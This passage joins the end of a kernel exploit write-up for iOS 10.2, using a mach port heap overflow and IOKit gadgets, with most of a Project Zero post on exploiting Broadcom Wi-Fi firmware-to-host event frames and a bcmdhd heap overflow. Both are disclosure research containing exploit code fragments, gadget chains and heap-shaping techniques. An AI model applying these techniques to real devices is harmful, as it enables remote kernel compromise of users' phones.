Note that if we just send the message and immediately receive it we’ll read back what we wrote. In order to read back something interesting we have to change what’s there. We can do that by sending a message to the second port after we’ve sent the message to the first port but before we’ve received it.
We observed before that if a port’s message queue is empty when a message is enqueued, the ikm_next field will point back to the message itself. So by sending a message to second_port (overwriting its header with one that keeps the ipc_kmsg valid and unused) then reading back the message sent to first_port, we can determine the address of the second port’s ipc_kmsg buffer.
read/write to arbitrary read/write
We’ve turned our single heap overflow into the ability to reliably overwrite and read back the contents of a 240 byte region after the first_port ipc_kmsg object as often as we want. We also know where that region is in the kernel’s virtual address space. The final step is to turn that into the ability to read and write arbitrary kernel memory.
For the mach_portal exploit I went straight for the kernel task port object. This time I chose to go a different path and build on a neat trick I saw in the Pegasus exploit detailed in the Lookout writeup.
Whoever developed that exploit had found that the IOKit OSSerializer::serialize method is a very neat gadget that lets you turn the ability to call a function with one argument that points to controlled data into the ability to call another controlled function with two completely controlled arguments.
In order to use this we need to be able to call a controlled address passing a pointer to controlled data. We also need to know the address of OSSerializer::serialize.
Let’s free second_port and reallocate an IOKit userclient there:
  // send another message on first
  // writing a valid, safe header back over second
  send_prealloc_msg(first_port, valid_header, 8);

  // free second and get it reallocated as a userclient:
  mach_port_deallocate(mach_task_self(), second_port);
  mach_port_destroy(mach_task_self(), second_port);

  mach_port_t uc = alloc_userclient();

  // read back the start of the userclient buffer:
  buf = receive_prealloc_msg(first_port);
  // save a copy of the original object:
  memcpy(legit_object, buf, sizeof(legit_object));

  // this is the vtable for AGXCommandQueue
  uint64_t vtable = buf[0];
alloc_userclient allocates user client type 5 of the AGXAccelerator IOService which is an AGXCommandQueue object. IOKit’s default operator new uses kalloc and AGXCommandQueue is 0xdb8 bytes so it will also use the kalloc.4096 zone and reuse the memory just freed by the second_port ipc_kmsg.
Note that we sent another message with a valid header to first_port which overwrote second_port’s header with a valid header. This is so that after second_port is freed and the memory reused for the user client we can dequeue the message from first_port and read back the first 240 bytes of the AGXCommandQueue object. The first qword is a pointer to the AGXCommandQueue’s vtable; using this we can determine the KASLR slide and thus work out the address of OSSerializer::serialize.
Calling any IOKit MIG method on the AGXCommandQueue userclient will likely result in at least three virtual calls: ::retain() will be called by iokit_lookup_connect_port by the MIG intran for the userclient port. This method also calls ::getMetaClass(). Finally the MIG wrapper will call iokit_remove_connect_reference which will call ::release().
Since these are all C++ virtual methods they will pass the this pointer as the first (implicit) argument meaning that we should be able to fulfil the requirement to be able to use the OSSerializer::serialize gadget. Let’s look more closely at exactly how that works:
class OSSerializer : public OSObject
{
  OSDeclareDefaultStructors(OSSerializer)

  void * target;
  void * ref;
  OSSerializerCallback callback;

  virtual bool serialize(OSSerialize * serializer) const;
};
bool OSSerializer::serialize( OSSerialize * s ) const{  return( (*callback)(target, ref, s) );}
It’s clearer what’s going on if we look at the disassembly of OSSerializer::serialize:
; OSSerializer::serialize(OSSerializer *__hidden this, OSSerialize *)
MOV  X8, X1
LDP  X1, X3, [X0,#0x18] ; load X1 from [X0+0x18] and X3 from [X0+0x20]
LDR  X9, [X0,#0x10]     ; load X9 from [X0+0x10]
MOV  X0, X9
MOV  X2, X8
BR   X3                 ; call [X0+0x20] with X0=[X0+0x10] and X1=[X0+0x18]
Since we have read/write access to the first 240 bytes of the AGXCommandQueue userclient and we know where it is in memory we can replace it with the following fake object which will turn a virtual call to ::release into a call to an arbitrary function pointer with two controlled arguments:

We’ve redirected the vtable pointer to point back to this object so we can interleave the vtable entries we need along with the data. We now just need one more primitive on top of this to turn an arbitrary function call with two controlled arguments into an arbitrary memory read/write.
Functions like copyin and copyout are the obvious candidates as they will handle any complexities involved in copying across the user/kernel boundary, but they both take three arguments (source, destination and size), and we can only completely control two.
However since we already have the ability to read and write this fake object from userspace we can actually just copy values to and from this kernel buffer rather than having to copy to and from userspace directly. This means we can expand our search to any memory copying functions like memcpy. Of course memcpy, memmove and bcopy all also take three arguments so what we need is a wrapper around one of those which passes a fixed size.
Looking through the cross-references to those functions we find uuid_copy:
; uuid_copy(uuid_t dst, const uuid_t src)
MOV  W2, #0x10 ; size
B    _memmove
This function is just a simple wrapper around memmove which always passes a fixed size of 16 bytes. Let’s integrate that final primitive into the serializer gadget:

To make the read into a write we just swap the order of the arguments to copy from an arbitrary address into our fake userclient object, then receive the exception message to read back the data.
You can download my exploit for iOS 10.2 on iPod 6G here:
This bug was also independently discovered and exploited by Marco Grassi and qwertyoruiopz, check out their code to see a different approach to exploiting this bug which also uses mach ports.
Critical code should be criticised
Every developer makes mistakes and they’re a natural part of the software development process (especially when the compiler is egging you on!). However, brand new kernel code on the 1B+ devices running XNU deserves special attention. In my opinion this bug was a clear failure of the code review processes in place at Apple and I hope bugs and writeups like these are taken seriously and some lessons are learnt from them.
Perhaps most importantly: I think this bug would have been caught in development if the code had any tests. As well as having a critical security bug the code just doesn’t work at all for a recipe with a size greater than 256. On MacOS such a test would immediately kernel panic. I find it consistently surprising that the coding standards for such critical codebases don’t enforce the development of even basic regression tests.
XNU is not alone in this; it’s a common story across many codebases. For example, LG shipped an Android kernel with a new custom syscall containing a trivial unbounded strcpy that was triggered by Chrome’s normal operation. For extra irony, the custom syscall collided with the syscall number for sys_seccomp, the exact feature Chrome was trying to add support for in order to prevent such issues from being exploitable.

Over The Air: Exploiting Broadcom’s Wi-Fi Stack (Part 2)

Google Project Zero - Tue, 04/11/2017 - 13:03
Posted by Gal Beniamini, Project Zero
In this blog post we'll continue our journey into gaining remote kernel code execution, by means of Wi-Fi communication alone. Having previously developed a remote code execution exploit giving us control over Broadcom’s Wi-Fi SoC, we are now left with the task of exploiting this vantage point in order to further elevate our privileges into the kernel.

In this post, we’ll explore two distinct avenues for attacking the host operating system. In the first part, we’ll discover and exploit vulnerabilities in the communication protocols between the Wi-Fi firmware and the host, resulting in code execution within the kernel. Along the way, we’ll also observe a curious vulnerability which persisted until quite recently, using which attackers were able to directly attack the internal communication protocols without having to exploit the Wi-Fi SoC in the first place! In the second part, we’ll explore hardware design choices allowing the Wi-Fi SoC in its current configuration to fully control the host without requiring a vulnerability in the first place.
While the vulnerabilities discussed in the first part have been disclosed to Broadcom and are now fixed, the utilisation of hardware components remains as it is, and is currently not mitigated against. We hope that by publishing this research, mobile SoC manufacturers and driver vendors will be encouraged to create more secure designs, allowing a better degree of separation between the Wi-Fi SoC and the application processor.
Part 1 - The “Hard” Way
The Communication Channel
As we’ve established in the previous blog post, the Wi-Fi firmware produced by Broadcom is a FullMAC implementation. As such, it’s responsible for handling much of the complexity required for the implementation of 802.11 standards (including the majority of the MLME layer).
Yet, while many of the operations are encapsulated within the Wi-Fi chip’s firmware, some degree of control over the Wi-Fi state machine is required within the host’s operating system. Certain events cannot be handled solely by the Wi-Fi SoC, and must therefore be communicated to the host’s operating system. For example, the host must be notified of the results of a Wi-Fi scan in order to be able to present this information to the user.
In order to facilitate these cases where the host and the Wi-Fi SoC wish to communicate with one another, a special communication channel is required.
However, recall that Broadcom produces a wide range of Wi-Fi SoCs, which may be connected to the host via many different interfaces (including USB, SDIO or even PCIe). This means that relying on the underlying communication interface might require re-implementing the shared communication protocol for each of the supported channels -- quite a tedious task.

Perhaps there’s an easier way? Well, one thing we can always be certain of is that regardless of the communication channel used, the chip must be able to transmit received frames back to the host. Indeed, perhaps for the very same reason, Broadcom chose to piggyback on top of this channel in order to create the communication channel between the SoC and the host.
When the firmware wishes to notify the host of an event, it does so by simply encoding a “special” frame and transmitting it to the host. These frames are marked by a “unique” EtherType value of 0x886C. They do not contain actual received data, but rather encapsulate information about firmware events which must be handled by the host’s driver.

Securing the Channel
Now, let’s switch over to the host’s side. On the host, the driver can logically be divided into several layers. The lower layers deal with the communication interface itself (such as SDIO, PCIe, etc.) and whatever transmission protocol may be tied to it. The higher layers then deal with the reception of frames, and their subsequent processing (if necessary).
First, the upper layers perform some initial processing on the received frames, such as removing encapsulated data which may have been added on top of them (for example, transmission power indicators added by the PHY module). Then, an important distinction must be made - is this a regular frame that should simply be forwarded to the relevant network interface, or is it in fact an encoded event that the host must handle?
As we’ve just seen, this distinction is easily made! Just take a look at the ethertype and check whether it has the “special” value of 0x886C. If so, handle the encapsulated event and discard the frame.
Or is it?
In fact, there is no guarantee that this ethertype is unused in every single network and by every single device. Incidentally, it seems that the very same ethertype is used for the LARQ protocol used in HPNA chips (initially developed by Epigram, and subsequently purchased by Broadcom).
Regardless of this little oddity - this brings us to our first question: how can the Wi-Fi SoC and host driver distinguish between externally received frames with the 0x886C ethertype (which should be forwarded to the network interface), and internally generated event frames (which should not be received from external sources)?
This is a crucial question; the internal event channel, as we’ll see shortly, is extremely powerful and provides a huge, mostly unaudited, attack surface. If attackers are able to inject frames over-the-air that can subsequently be processed as event frames by the driver, they may very well be able to achieve code execution within the host’s operating system.
Well… Until several months prior to this research (mid 2016), the firmware made no effort to filter these frames. Any frame received as part of the data RX-path, regardless of its ethertype, was simply forwarded blindly to the host. As a result, attackers were able to remotely send frames containing the special 0x886C ethertype, which were then processed by the driver as if they were event frames created by the firmware itself!
So how was this issue addressed? After all, we’ve already established that just filtering the ethertype itself is not sufficient. Observing the differences between the pre- and post- patched versions of the firmware reveals the answer: Broadcom went for a combined patch, targeting both the Wi-Fi SoC’s firmware and the host’s driver.
The patch adds a validation method (is_wlc_event_frame) both to the firmware’s RX path, and to the driver. On the chip’s side, the validation method is called immediately before transmitting a received frame to the host. If the validation method deems the frame to be an event frame, it is discarded. Otherwise, the frame is forwarded to the driver. Then, the driver calls the exact same verification method on received frames with the 0x886C ethertype, and processes them only if they pass the same validation method. Here is a short schematic detailing this flow:

As long as the validation methods in the driver and the firmware remain identical, externally received frames cannot be processed as events by the driver. So far so good.
However… Since we already have code-execution on the Wi-Fi SoC, we can simply “revert” the patch. All it takes is for us to “patch out” the validation method in the firmware, thereby causing any received frame to once again be forwarded blindly to the host. This, in turn, allows us to inject arbitrary messages into the communication protocol between the host and the Wi-Fi chip. Moreover, since the validation method is stored in RAM, and all of RAM is marked as RWX, this is as simple as writing “MOV R0, #0; BX LR” to the function’s prologue.

The Attack Surface
As we mentioned earlier, the attack surface exposed by the internal communication channel is huge. Tracing the control flow from the entry point for handling event frames (dhd_wl_host_event), we can see that several events receive “special treatment”, and are processed independently (see wl_host_event and wl_show_host_event). Once the initial treatment is done, the frames are inserted into a queue. Events are then dequeued by a kernel thread whose sole purpose is to read events from the queue and dispatch them to their corresponding handler function. This correlation is done by using the event’s internal “event-type” field as an index into an array of handler functions, called evt_handler.

While there are up to 144 different supported event codes, the host driver for Android, bcmdhd, only supports a much smaller subset of these. Nonetheless, about 35 events are supported within the driver, each including their own elaborate handlers.
Now that we’re convinced that the attack surface is large enough, we can start hunting for bugs! Unfortunately, it seems that the Wi-Fi chip is considered “trusted”; as a result, some of the validations in the host’s driver are insufficient… Indeed, auditing the relevant handler functions and auxiliary protocol handlers outlined above, we find a substantial number of vulnerabilities.
The Vulnerability
Taking a closer look at the vulnerabilities we’ve found, we can see that they all differ from one another slightly. Some allow for relatively strong primitives, some weaker. However, most importantly, many of them have various preconditions which must be fulfilled to successfully trigger them; some are limited to certain physical interfaces, while others work only in certain configurations of the driver. Nonetheless, one vulnerability seems to be present in all versions of bcmdhd and in all configurations - if we can successfully exploit it, we should be set.
Let’s take a closer look at the event frame in question. Events of type "WLC_E_PFN_SWC" are used to indicate that a “Significant Wi-Fi Change” (SWC) has occurred within the firmware and must be handled by the host. Instead of directly handling these events, the host’s driver simply gathers all the transferred data from the firmware, and broadcasts a “vendor event” packet via Netlink to the cfg80211 layer.
More concretely, each SWC event frame transmitted by the firmware contains an array of events (of type wl_pfn_significant_net_t), a total count (total_count), and the number of events in the array (pkt_count). Since the total number of events can be quite large, it might not fit in a single frame (i.e., it might be larger than the maximal MSDU). In this case, multiple SWC event frames can be sent consecutively - their internal data will be accumulated by the driver until the total count is reached, at which point the driver will process the entire list of events.
Reading through the driver’s code, we can see that when this event code is received, an initial handler is triggered in order to deal with the event. The handler then internally calls into the "dhd_handle_swc_evt" function in order to process the event's data. Let’s take a closer look:
void* dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes)
{
    ...
    wl_pfn_swc_results_t *results = (wl_pfn_swc_results_t *)event_data;
    ...
    gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);
    params = &(gscan_params->param_significant);
    ...
    if (!params->results_rxed_so_far) {
        if (!params->change_array) {
            params->change_array = (wl_pfn_significant_net_t *)
                kmalloc(sizeof(wl_pfn_significant_net_t) * results->total_count,
                        GFP_KERNEL);
            ...
        }
    }
    ...
    change_array = &params->change_array[params->results_rxed_so_far];
    memcpy(change_array,
           results->list,
           sizeof(wl_pfn_significant_net_t) * results->pkt_count);
    params->results_rxed_so_far += results->pkt_count;
    ...
}
(where "event_data" is the arbitrary data encapsulated in the event passed in from the firmware)
As we can see above, the function first allocates an array to hold the total count of events (if one hasn’t been allocated before) and then proceeds to concatenate the encapsulated data starting from the appropriate index (results_rxed_so_far) in the buffer.
However, the handler fails to verify the relation between the total_count and the pkt_count! It simply “trusts” the assertion that the total_count is sufficiently large to store all the subsequent events passed in. As a result, an attacker with the ability to inject arbitrary event frames can specify a small total_count and a larger pkt_count, thereby triggering a simple kernel heap overflow.
Remote Kernel Heap Shaping
This is all well and good, but how can we leverage this primitive from a remote vantage point? As we’re not locally present on the device, we’re unable to gather any data about the current state of the heap, nor do we have address-space related information (unless, of course, we’re able to somehow leak this information). Many classic exploits targeting kernel heap overflows rely on the ability to shape the kernel’s heap, ensuring a certain state prior to triggering an overflow - an ability we also lack at the moment.
What do we know about the allocator itself? There are a few possible underlying implementations for the kmalloc allocator (SLAB, SLUB, SLOB), configurable when building the kernel. However, on the vast majority of devices, kmalloc uses “SLUB” - an unqueued “slab allocator” with per-CPU caches.
Each “slab” is simply a small region from which identically-sized allocations are carved. The first chunk in each slab contains its metadata (such as the slab’s freelist), and subsequent blocks contain the allocations themselves, with no inline metadata. There are a number of predefined slab size-classes which are used by kmalloc, typically spanning from as little as 64 bytes, to around 8KB. Unsurprisingly, the allocator uses the best-fitting slab (smallest slab that is large enough) for each allocation. Lastly, the slabs’ freelists are consumed linearly - consecutive allocations occupy consecutive memory addresses. However, if objects are freed within the slab, it may become fragmented - causing subsequent allocations to fill-in “holes” within the slab instead of proceeding linearly.
With this in mind, let’s take a step back and analyse the primitives at hand. First, since we are able to arbitrarily specify any value in total_count, we can choose the overflown buffer’s size to be any multiple of sizeof(wl_pfn_significant_net). This means we can inhabit any slab cache size of our choosing. As such, there’s no limitation on the size of the objects we can target with the overflow. However, this is not quite enough… For starters, we still don’t know anything about the current state of the slabs themselves, nor can we trigger remote allocations in slabs of our choosing.
It seems that first and foremost, we need to find a way to remotely shape slabs. Recall, however, that there are a few obstacles we need to overcome. As SLUB maintains per-CPU caches, the affinity of the kernel thread in which the allocation is performed must be the same as the one from which the overflown buffer is allocated. Gaining a heap shaping primitive on a different CPU core will cause the allocations to be taken from different slabs. The most straightforward way to tackle this issue is to confine ourselves to heap shaping primitives which can be triggered from the same kernel thread on which the overflow occurs. This is quite a substantial constraint… In essence, it forces us to disregard allocations that occur as a result of processes that are external to the event handling itself.
Regardless, with a concrete goal in mind, we can start looking for heap shaping primitives in the registered handlers for each of the event frames. As luck would have it, after going through every handler, we come across a (single) perfect fit!
Event frames of type “WLC_E_PFN_BSSID_NET_FOUND” are handled by the handler function dhd_handle_hotlist_scan_evt. This function accumulates a linked list of scan results. Every time an event is received, its data is appended to the list. Finally, when an event arrives with a flag indicating it is the last event in the chain, the function passes on the collected list of events to be processed. Let’s take a closer look:
void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data,
                                  int *send_evt_bytes, hotlist_type_t type)
{
    struct dhd_pno_gscan_params *gscan_params;
    wl_pfn_scanresults_t *results = (wl_pfn_scanresults_t *)event_data;
    gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);
    ...
    malloc_size = sizeof(gscan_results_cache_t) +
                      ((results->count - 1) * sizeof(wifi_gscan_result_t));
    gscan_hotlist_cache = (gscan_results_cache_t *)kmalloc(malloc_size, GFP_KERNEL);
    ...
    gscan_hotlist_cache->next = gscan_params->gscan_hotlist_found;
    gscan_params->gscan_hotlist_found = gscan_hotlist_cache;
    ...
    gscan_hotlist_cache->tot_count = results->count;
    gscan_hotlist_cache->tot_consumed = 0;
    plnetinfo = results->netinfo;
    for (i = 0; i < results->count; i++, plnetinfo++) {
        hotlist_found_array = &gscan_hotlist_cache->results[i];
        ... // Populate the entry with the sanitised network information
    }
    if (results->status == PFN_COMPLETE) {
        ... // Process the entire chain
    }
    ...
}
Awesome - looking at the function above, it seems that we’re able to repeatedly cause allocations of size { sizeof(gscan_results_cache_t) + (N-1) * sizeof(wifi_gscan_result_t) | N > 0 } (where N denotes results->count). What’s more, these allocations are performed in the same kernel thread, and their lifetime is completely controlled by us! As long as we don’t send an event with the PFN_COMPLETE status, none of the allocations will be freed.
Before we move on, we’ll need to choose a target slab size. Ideally, we’re looking for a slab that’s relatively inactive. If other threads on the same CPU choose to allocate (or free) data from the same slab, this would add uncertainty to the slab’s state and may prevent us from successfully shaping it. After looking at /proc/slabinfo and tracing kmalloc allocations for every slab with the same affinity as our target kernel thread, it seems that the kmalloc-1024 slab is mostly inactive. As such, we’ll choose to target this slab size in our exploit.
By using the heap shaping primitive above we can start filling slabs of any given size with  “gscan” objects. Each “gscan” object has a short header containing some metadata relating to the scan and a pointer to the next element in the linked list. The rest of the object is then populated by an inline array of “scan results”, carrying the actual data for this node.
Going back to the issue at hand - how can we use this primitive to craft a predictable layout?
Well, by combining the heap shaping primitive with the overflow primitive, we should be able to properly shape slabs of any size-class prior to triggering the overflow. Recall that initially, any given slab may be fragmented, like so:
However, after triggering enough allocations (e.g. (SLAB_TOTAL_SIZE / SLAB_OBJECT_SIZE) - 1) with our heap shaping primitive, all the holes (if present) in the current slab should get populated, causing subsequent allocations of the same size-class to be placed consecutively.
Now, we can send a single crafted SWC event frame, indicating a total_count resulting in an allocation from the same target slab. However, we don’t want to trigger the overflow yet! We still have to shape the current slab before we do so. To prevent the overflow from occurring, we’ll provide a small pkt_count, thereby only partially filling in the buffer.
Finally, using the heap shaping primitive once again, we can fill the rest of the slab with more of our “gscan” objects, bringing us to the following heap state:

Okay… We’re getting there! As we can see above, if we choose to use the overflow primitive at this point, we could overwrite the contents of one of the “gscan” objects with our own arbitrary data. However, we’ve yet to determine exactly what kind of result this would yield…
Analysing The Constraints
In order to determine the effect of overwriting a “gscan” object, let’s take a closer look at the flow that processes a chain of “gscan” objects (that is, the operations performed after an event with a “completion” flag is received). This processing is handled by wl_cfgvendor_send_hotlist_event. The function goes over each of the events in the list, packs the event’s data into an SKB, and subsequently broadcasts the SKB over Netlink to any potential listeners.
However, the function does have a certain obstacle it needs to overcome; any given “gscan” node may be larger than the maximal size of an SKB. Therefore, the node would need to be split into several SKBs. To keep track of this information, the “tot_count” and “tot_consumed” fields in the “gscan” structure are utilised. The “tot_count” field indicates the total number of embedded scan result entries in the node’s inline array, and the “tot_consumed” field indicates the number of entries consumed (transmitted) so far.
As a result, the function slightly modifies the contents of the list while processing it. Essentially, it enforces the invariant that each processed node’s “tot_consumed” field will be modified to match its “tot_count” field. As for the data being transmitted and how it’s packed, we’ll skip those details for brevity’s sake. However, it’s important to note that other than the aforementioned side effect, the function above appears to be quite harmless (that is, no further primitives can be “mined” from it). Lastly, after all the events are packed into SKBs and transmitted to any listeners, they can finally be reclaimed. This is achieved by simply walking over the list, and calling “kfree” on each entry.
Putting it all together, where does this leave us with regards to exploitation? Assuming we choose to overwrite one of the “gscan” entries using the overflow primitive, we can modify its “next” field (or rather, must, as it is the first field in the structure) and point it at any arbitrary address. This would cause the processing function to use this arbitrary pointer as if it were an element in the list.
Due to the invariant of the processing function - after processing the crafted entry, its 7th byte (“tot_consumed”) will be modified to match its 6th byte (“tot_count”). In addition, the pointer will then be kfree-d after processing the chain. What’s more, recall that the processing function iterates over the entire list of entries. This means that the first four bytes in the crafted entry (its “next” field) must either point to another memory location containing a “valid” list node (which must then satisfy the same constraints), or must otherwise hold the value 0 (NULL), indicating that this is the last element in the list.
This doesn’t look easy… There’s quite a large number of constraints we need to consider. If we willfully choose to ignore the kfree for a moment, we could try and search for memory locations where the first four bytes are zero, and where it would be beneficial to modify the 7th byte to match the 6th. Of course, this is just the tip of the iceberg; we could repeatedly trigger the same primitive in order to repeatedly copy bytes one position to the left. Perhaps, if we were able to locate a memory address where enough zero bytes and enough bytes of our choosing are present, we could craft a target value by consecutively using these two primitives.
In order to gauge the feasibility of this approach, I’ve encoded the constraints above in a small SMT instance (using Z3), and supplied the actual heap data from the kernel, along with various target values and their corresponding locations. Additionally, since the kernel’s translation table is stored at a constant address in the kernel’s VAS and even slight modifications to it can result in exploitable conditions, its contents (along with corresponding target values) were added to the SMT instance as well. The instance was constructed to be satisfiable if and only if any of the target values could occupy any of the target locations within no more than ten “steps” (where each step is an invocation of the primitive). Unfortunately, the results were quite grim… It seemed like this approach just wasn’t powerful enough.
Moreover, while this idea might be nice in theory, it doesn’t quite work in practice. You see, calling kfree on an arbitrary address is not without side-effects of its own. For starters, the page containing the memory address must be marked as either a “slab” page, or as “compound”. This only holds true (in general) for pages actually used by the slab allocator. Trying to call kfree on an address in a page that isn’t marked as such, triggers a kernel panic (thereby crashing the device).
Perhaps, instead, we can choose to ignore the other constraints and focus on the kfree? Indeed, if we are able to consistently locate an allocation whose data can be used for the purpose of the exploit, we could attempt to free that memory address, and then “re-capture” it by using our heap shaping primitive. However, this raises several additional questions. First, will we be able to consistently locate a slab-resident address? Second, even if we were to find such an address, surely it will be associated with a per-CPU cache, meaning that freeing it will not necessarily allow us to reclaim it later on. Lastly, whichever allocation we do choose to target, will have to satisfy the constraints above - that is, the first four bytes must be zero, and the 7th byte will be modified to match the 6th.
However, this is where some slight trickery comes in handy! Recall that kmalloc holds a number of fixed-size caches. Yet what should happen when a larger allocation is requested? It turns out that in that case, kmalloc simply allocates a number of consecutive free pages (using __get_free_pages) and returns them to the caller. This is done without any per-CPU caching. As such, if we are able to free a large allocation, we should then be able to reclaim it without having to consider which CPU allocated it in the first place.
This may solve the problem of affinity, but it still doesn’t help us locate these allocations. Unfortunately, the slab caches are allocated quite late in the kernel’s boot process, and their contents are very “noisy”. This means that even guessing a single address within a slab is quite difficult, even more so for remote attackers. However, early allocations which use the large allocation flow (that is, which are created using __get_free_pages) do consistently inhabit the same memory addresses! This is as long as they occur early enough during the kernel’s initialisation so that no non-deterministic events happen concurrently.
Combining these two facts, we can search for a large early allocation. After tracing the large allocation path and rebooting the kernel, it seems that there are indeed quite a few such allocations. To help navigate this large trace, we can also compile the Linux kernel with a special GCC plugin that outputs the size of each structure used in the kernel. Using these two traces, we can quickly navigate the early large allocations, and try and search for a potential match.
After going over the list, we come across one seemingly interesting entry:

Putting It All Together
During the bcmdhd driver’s initialisation, it calls the wiphy_new function in order to allocate an instance of wl_priv. This instance is used to hold much of the metadata related to the driver’s operation. But there’s one more sneaky little piece of data hiding within this structure - the event handler function pointer array used to handle incoming event frames! Indeed, the very same table we were discussing earlier on (evt_handler), is stored within this object. This leads us to a direct path for exploitation - simply kfree this object, then send an SWC event frame to reclaim it, and fill it with our own arbitrary data.
Before we can do so, however, we’ll need to make sure that the object satisfies the constraints mandated by the processing function. Namely, the first four bytes must be zero, and we must be able to modify the 7th byte to match the value of the 6th byte. While the second constraint poses no issue at all, the first constraint turns out to be quite problematic! As it happens, the first four bytes are not zero, but in fact point to a block of function pointers related to the driver. Does this mean we can’t use this object after all?
No - as luck would have it, we can still use one more trick! It turns out that when kfree-ing a large allocation, the code path for kfree doesn’t require the passed in pointer to point to the beginning of the allocation. Instead, it simply fetches the pages corresponding to the allocation, and frees them instead. This means that by specifying an address located within the structure that does match the constraints, we’ll be able to both satisfy the requirements imposed by the processing function and free the underlying object. Great.
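The search for a suitable interior pointer can be scripted against a raw dump of the object. A toy sketch of the first constraint only (the real check also involves the 6th and 7th bytes, and the viable offsets depend on the processing function):

```python
def find_freeable_offset(obj_bytes):
    """Find an interior offset whose first dword is zero.

    Passing (base + offset) to kfree still frees the pages backing the
    whole large allocation, while the zero dword satisfies the processing
    function's first constraint.
    """
    for off in range(0, len(obj_bytes) - 4, 4):
        if obj_bytes[off:off + 4] == b"\x00\x00\x00\x00":
            return off
    return None
```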
Putting this all together, we can now simply send along an SWC event frame in order to reclaim the evt_handler function pointer array, and populate it with our own contents. As there is no KASLR, we can search for a stack pivot gadget in the kernel image that will allow us to gain code execution. For the purpose of the exploit, I’ve chosen to replace the event handler for WLC_E_SET_SSID with a stack pivot into the event frame itself (which is stored in R2 when the event handler is executed). Lastly, by placing a ROP stack in a crafted event frame of type WLC_E_SET_SSID, we can now gain control over the kernel thread’s execution, thus completing our exploit.

You can find a sample exploit for this vulnerability here. It includes a short ROP chain that simply calls printk. The exploit was built against a Nexus 5 with a custom kernel version. In order to modify it to work against different kernel versions, you’ll need to fill in the appropriate symbols. Moreover, while the primitives are still present in 64-bit devices, there might be additional work required in order to adjust the exploit for those platforms.
With that, let’s move on to the second part of the blog post!

Part 2 - The “Easy” Way

How Low Can You Go?
Although we’ve seen that the high-level communication protocols between the Wi-Fi firmware and the host may be compromised, we’ve also seen how tedious it can be to write a fully-functional exploit. Indeed, the exploit detailed above required sufficient information about the device being targeted (such as symbols). Furthermore, any mistake during exploitation might crash the kernel, thereby rebooting the device and requiring us to start all over again. This fact, coupled with our transient control over the Wi-Fi SoC, makes this type of exploit chain harder to use reliably.
That said, up until now we’ve only considered the high-level attack surface exposed to the firmware. In effect, we were thinking of the Wi-Fi SoC and the application processor as two distinct entities which are completely isolated from one another. In reality, nothing could be further from the truth. Not only are the Wi-Fi SoC and the host physically proximate to one another, they also share a physical communication interface.
As we’ve seen before, Broadcom manufactures SoCs that support various interfaces, including SDIO, USB and even PCIe. While the SDIO interface used to be quite popular, in recent years it has fallen out of favour in mobile devices. The main reason for the “disappearance” of SDIO is its limited transfer speeds. As an example, Broadcom’s BCM4339 SoC supports SDIO 3.0, a fairly advanced version of SDIO. Nonetheless, it is still limited to a theoretical maximal bus speed of 104 MB/s. On the other hand, 802.11ac has a theoretical maximal speed of 166 MB/s - much more than SDIO can cope with.

BCM4339 Block Diagram
The increased transfer rates caused PCIe to become the most prevalent interface used to connect Wi-Fi SoCs in modern mobile devices. PCIe, unlike PCI, is based on a point-to-point topology; every device has its own serial link connecting it to the host. Due to this design, PCIe enjoys much higher transfer rates per lane than the equivalent rates on PCI (since bus access doesn’t need to be arbitrated); PCIe 1.0 has a throughput of 250 MB/s on a single lane (scaling linearly with the number of lanes).
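The 250 MB/s figure follows directly from the line rate: PCIe 1.0 signals at 2.5 GT/s per lane with 8b/10b encoding, so only 8 of every 10 bits on the wire carry payload:

```python
line_rate = 2_500_000_000                    # PCIe 1.0: 2.5 GT/s per lane
throughput_bytes = line_rate * 8 // 10 // 8  # 8b/10b: 8 payload bits per 10 line bits
print(throughput_bytes)                      # 250000000, i.e. 250 MB/s per lane
```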
More concretely, let’s take a look at the adoption rate of PCIe in modern mobile devices. Taking Nexus phones as a case study, it seems that since the Nexus 6, all devices use a PCIe interface instead of SDIO. Much in the same way, all iPhones since the iPhone 6 use PCIe (whereas old iPhones used USB to connect to the Wi-Fi SoC). Lastly, all Samsung flagships since the Galaxy S6 use PCIe.

Interface Isolation
So why is this information relevant to our pursuits? Well, PCIe is significantly different to SDIO and USB in terms of isolation. Without going into the internals of each of the interfaces, SDIO simply allows the serial transfer of small command “packets” (on the CMD pin), potentially accompanied by data (on the DATA pins). The SDIO controller then decodes the command and responds appropriately. While SDIO may support DMA (for example, the host can set up a DMA engine to continually read data from the SD bus and transfer it to memory), this feature is not used on mobile devices, and is not an inherent part of SDIO. Furthermore, the low-level SDIO communication on the BCM SoC is handled by the “SDIOD” core. In order to craft special SDIO commands, we would most likely need to gain access to this controller first.
Likewise, USB (up to version 3.1) does not include support for DMA. The USB protocol is handled by the host’s USB controller, which performs the necessary memory access required. Of course, it might be possible to compromise the USB controller itself, and use its interface to the memory system in order to gain memory access. For example, on the Intel Hub Architecture, the USB controller connects to the PCH via PCI, which is capable of DMA. But once again, this kind of attack is rather complex, and is limited to specific architectures and USB controllers.
In contrast to these two interfaces, PCIe allows for DMA by design. This allows PCIe to operate at great speeds without incurring a performance hit on the host. Once data is transferred to the host’s memory, an interrupt is fired to indicate that work needs to be done.
On the transaction layer, PCIe operates by sending small bundles of data, appropriately named “Transaction Layer Packets” (TLPs). Each TLP may be routed by a network of switches, until it reaches the destined peripheral. There, the peripheral decodes the packet and performs the requested memory operation. The TLP’s header encodes whether this is a requested read or write operation, and its body contains any accompanying data related to the request.
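To make the header layout concrete, here is a minimal encoder for a 3DW Memory Write TLP with 32-bit addressing, following the field layout in the PCIe specification. This is purely illustrative - on real hardware the link layer and PHY generate this traffic, not software:

```python
import struct

def mwr32_tlp(requester_id, tag, addr, payload):
    """Build a 3DW Memory Write TLP (32-bit addressing).

    DW0: Fmt=010b (3DW header, with data), Type=00000b, Length in DWs.
    DW1: Requester ID, Tag, Last/First byte enables.
    DW2: target address (DW-aligned).
    """
    assert addr % 4 == 0 and payload and len(payload) % 4 == 0
    length_dw = len(payload) // 4
    byte_enables = 0x0F if length_dw == 1 else 0xFF  # LastBE must be 0 for 1 DW
    dw0 = (0x40 << 24) | (length_dw & 0x3FF)
    dw1 = (requester_id << 16) | (tag << 8) | byte_enables
    return struct.pack(">III", dw0, dw1, addr) + payload
```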
Structure of a Transaction Layer Packet (TLP)

IOU an MMU
